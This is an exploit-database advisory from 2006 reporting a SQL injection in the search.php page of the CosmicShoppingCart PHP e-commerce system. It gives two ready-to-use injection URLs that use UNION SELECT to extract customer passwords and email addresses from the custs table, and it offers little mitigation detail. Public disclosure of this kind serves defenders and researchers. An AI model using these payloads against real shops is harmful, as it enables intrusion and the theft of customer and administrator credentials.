[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability
# Published : 2006-05-28
# Author : Vympel
# Previous Title : Blend Portal <= 1.2.0 (phpBB Mod) Remote File Inclusion Vulnerability
# Next Title : Hot Open Tickets <= 11012004 (CLASS_PATH) Remote Include Vuln
Software: CosmicShoppingCart (www.cosmicphp.com)
Risk: Medium
Discovered by: Vympel (Marcelo Almeida)
Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed.
SQL injections have been found, they could be exploited by users to retrieve the passwords of the admin.
Examples:
cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--
# www.Syue.com [2006-05-28]